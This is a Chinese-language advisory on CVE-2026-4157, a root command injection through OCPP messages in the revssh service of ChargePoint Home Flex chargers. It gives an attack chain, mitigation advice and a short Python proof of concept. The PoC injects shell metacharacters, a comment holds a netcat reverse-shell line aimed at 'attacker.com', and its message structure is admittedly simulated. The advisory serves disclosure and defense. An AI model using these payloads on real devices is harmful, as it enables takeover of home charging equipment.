CVE-2026-4157 ChargePoint Home Flex远程命令执行漏洞

漏洞信息

漏洞编号

CVE-2026-4157

漏洞类型

远程命令执行

CVSS评分

7.5 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ChargePoint Home Flex

漏洞概述

ChargePoint Home Flex设备的revssh服务中存在严重的命令注入漏洞。由于系统在处理OCPP消息时未对用户输入进行有效验证，网络邻近的攻击者无需身份认证即可利用该漏洞。通过构造特制的数据包，攻击者能够绕过安全检查，将恶意指令注入到系统调用中，最终以root权限在目标设备上执行任意代码，从而完全接管设备。

技术细节

该漏洞的核心在于ChargePoint Home Flex设备中revssh服务对OCPP协议消息的解析逻辑存在安全缺陷。当服务接收到包含特定参数的OCPP消息时，会直接提取用户提供的字符串并将其传递给底层的系统调用接口，而未经过任何净化或转义处理。这一疏忽使得攻击者可以通过注入Shell元字符（如分号或管道符）来拼接并执行任意操作系统命令。鉴于revssh服务通常以最高权限运行，成功利用此漏洞将赋予攻击者root级别的访问权限，不仅允许读取敏感配置和数据，还能安装后门或破坏系统功能。由于攻击向量为邻接网络且无需认证，攻击者可轻易扫描目标并发起攻击，对物联网基础设施构成严重威胁。

攻击链分析

STEP 1

步骤1：网络侦察与定位

攻击者扫描局域网或邻近网络，识别在线的ChargePoint Home Flex充电设备及其开放的服务端口（如revssh服务端口）。

STEP 2

步骤2：构造恶意OCPP消息

攻击者利用漏洞知识，构造包含特殊Shell元字符（如;, |, &&）的恶意OCPP消息，旨在绕过字符串处理逻辑并注入系统命令。

STEP 3

步骤3：发送漏洞利用数据包

攻击者无需身份认证，直接通过网络邻接位置向目标设备的revssh服务发送特制的恶意数据包。

STEP 4

步骤4：触发命令注入

目标设备在处理该消息时，因缺乏输入验证，直接将恶意字符串传递给系统调用执行，导致攻击者注入的命令在系统后台运行。

STEP 5

步骤5：获取Root权限控制

由于服务以root权限运行，攻击者成功执行任意代码，获得设备的最高控制权，可进一步植入后门或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import json

# Proof of Concept for CVE-2026-4157
# This script demonstrates the command injection vulnerability in ChargePoint Home Flex OCPP handling.
# Target IP and Port (RevSSH Service)
TARGET_IP = "192.168.1.100"
TARGET_PORT = 80

def send_exploit():
    # The payload injects a shell command to create a reverse shell or execute a simple command
    # Example payload: ; nc attacker.com 4444 -e /bin/sh
    malicious_payload = "; id; echo pwned"

    # Constructing a malicious OCPP message (Simulated structure)
    # The vulnerability lies in how the 'chargePointModel' or similar field is processed
    exploit_data = {
        "messageType": 2,
        "messageId": "1",
        "action": "BootNotification",
        "payload": {
            "chargePointModel": malicious_payload,
            "chargePointSerialNumber": "Serial123"
        }
    }

    try:
        # Sending the malicious payload
        print(f"[*] Sending exploit to {TARGET_IP}:{TARGET_PORT}")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_IP, TARGET_PORT))
        s.send(json.dumps(exploit_data).encode())
        response = s.recv(1024)
        print("[+] Response received:")
        print(response.decode())
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

影响范围

ChargePoint Home Flex (所有存在revssh服务漏洞的固件版本)

防御指南

临时缓解措施

如果无法立即修补，建议将ChargePoint Home Flex设备放置在隔离的网络区域中，并严格限制访问其管理端口的IP地址。同时，应密切关注官方安全通告，并在补丁可用后第一时间进行更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4157
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4157
3 Details https://www.cvedetails.com/cve/CVE-2026-4157/
4 VulDB https://vuldb.com/cve/CVE-2026-4157
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-197/